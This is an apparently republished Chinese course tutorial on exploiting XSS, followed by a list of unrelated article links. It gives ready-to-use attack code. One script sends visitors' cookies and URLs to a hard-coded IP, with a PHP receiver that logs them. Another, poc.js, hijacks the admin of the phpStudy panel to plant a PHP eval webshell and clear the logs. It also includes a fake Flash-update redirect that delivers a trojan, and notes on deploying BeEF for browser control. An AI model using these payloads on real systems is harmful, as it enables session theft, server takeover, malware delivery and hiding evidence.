当前位置: 首页 > news >正文

Day54:WEB攻防-XSS跨站Cookie盗取表单劫持网络钓鱼溯源分析项目平台框架

目录

XSS跨站-攻击利用-凭据盗取

XSS跨站-攻击利用-数据提交

XSS跨站-攻击利用-flash钓鱼

XSS跨站-攻击利用-溯源综合


知识点:

1、XSS跨站-攻击利用-凭据盗取

2、XSS跨站-攻击利用-数据提交

3、XSS跨站-攻击利用-网络钓鱼

4、XSS跨站-攻击利用-溯源综合

漏洞原理:接受输入数据,输出显示数据后解析执行

基础类型:反射(非持续),存储(持续)DOM-BASE

拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等

常用标签:https://www.freebuf.com/articles/web/340080.html

攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等

安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等

测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)

XSS跨站-攻击利用-凭据盗取

条件:无防护Cookie凭据获取

把该XSS源码放到外网服务器上运行

登录前台测试账号

当用户申请提现时,管理员后台是能看到一些申请体现信息,这时候就会产生XSS漏洞

成功进入后台

触发代码

<script>var url='http://47.94.236.117/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>

47.94.236.117服务器上写一个getcookie.php脚本
接受:

<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能数据包,利用JS写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
payload:

<script src="http://xx.xxx.xxx/poc.js"></script>

poc.js //要放在外网服务器WEB目录下,这个代码专门针对小皮面板写的

function poc(){js$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();data.task_id="";data.title="test";data.exec_cycle="1";data.week="1";data.day="3";data.hour="14";data.minute = "20";data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

管理员登陆后查看日志触发

XSS跨站-攻击利用-flash钓鱼

部署可访问的钓鱼页面并修改

点击立即下载后,就会下载木马文件

植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash'</script>

点击确定后就会来到准备好的钓鱼页面,立即下载地址就可以填木马地址

项目地址:https://github.com/r00tSe7en/Fake-flash.cn

XSS跨站-攻击利用-溯源综合

XSS数据平台-XSSReceiver(这是给个人搭建的XSS平台,不想使用网上的XSS平台可以用这个项目)

简单配置即可使用,无需数据库,无需其他组件支持
项目地址:https://github.com/epoch99/BlueLotus_XSSReceiver-master
搭建非常简单,下载源码下来放入phpstudy目录下访问安装即可

浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用
缺点:如果对方浏览器关闭,权限就会掉
搭建:docker run --rm -p 3000:3000 janes/beef //安装命令

这个代码插入到网站首页html里,这样当别人访问这个首页文件就会被劫持

相关文章:

  • T2最长的AB序列(20分) - 京东前端笔试编程题题解
  • 拿到运营商给的IP池
  • 课时81:流程控制_循环控制_continue实践
  • go: go.mod file not found in current directory or any parent directory.如何解决?
  • C++20中的jthread
  • ES学习日记(三)-------第三方插件选择
  • 【Laravel】07 快速套用一个网站模板
  • 如何通过Elasticsearch实现搜索的关键词达到高亮的效果
  • Day1 - Hive基础知识
  • HarmonyOS 应用开发之Stage模型启动FA模型PageAbility
  • 【Pytorch学习笔记(二)】张量的创建(补充)
  • MySQL编程实战LeetCode经典考题
  • AR-Net网络(图像篡改检测)
  • zotero中的mdnotes插件点击创建markdown文件无反应
  • Karrier One在Sui上构建无线电话服务
  • [译] React v16.8: 含有Hooks的版本
  • 【5+】跨webview多页面 触发事件(二)
  • 【许晓笛】 EOS 智能合约案例解析(3)
  • Centos6.8 使用rpm安装mysql5.7
  • CNN 在图像分割中的简史:从 R-CNN 到 Mask R-CNN
  • ECMAScript 6 学习之路 ( 四 ) String 字符串扩展
  • Eureka 2.0 开源流产,真的对你影响很大吗?
  • java中的hashCode
  • LintCode 31. partitionArray 数组划分
  • oschina
  • Vue.js-Day01
  • 动手做个聊天室,前端工程师百无聊赖的人生
  • 服务器从安装到部署全过程(二)
  • 聊聊flink的TableFactory
  • 让你成为前端,后端或全栈开发程序员的进阶指南,一门学到老的技术
  • 使用docker-compose进行多节点部署
  • PostgreSQL之连接数修改
  • scrapy中间件源码分析及常用中间件大全
  • ​什么是bug?bug的源头在哪里?
  • #LLM入门|Prompt#2.3_对查询任务进行分类|意图分析_Classification
  • %check_box% in rails :coditions={:has_many , :through}
  • (function(){})()的分步解析
  • (三分钟了解debug)SLAM研究方向-Debug总结
  • (十)c52学习之旅-定时器实验
  • (图)IntelliTrace Tools 跟踪云端程序
  • (转) 深度模型优化性能 调参
  • (转)EOS中账户、钱包和密钥的关系
  • .[hudsonL@cock.li].mkp勒索病毒数据怎么处理|数据解密恢复
  • .axf 转化 .bin文件 的方法
  • .gitignore文件—git忽略文件
  • .gitignore文件设置了忽略但不生效
  • .net core 依赖注入的基本用发
  • .Net Core与存储过程(一)
  • .net MVC中使用angularJs刷新页面数据列表
  • .NET 将混合了多个不同平台(Windows Mac Linux)的文件 目录的路径格式化成同一个平台下的路径
  • .net中应用SQL缓存(实例使用)
  • .Net转前端开发-启航篇,如何定制博客园主题
  • .w文件怎么转成html文件,使用pandoc进行Word与Markdown文件转化
  • /proc/vmstat 详解
  • @select 怎么写存储过程_你知道select语句和update语句分别是怎么执行的吗?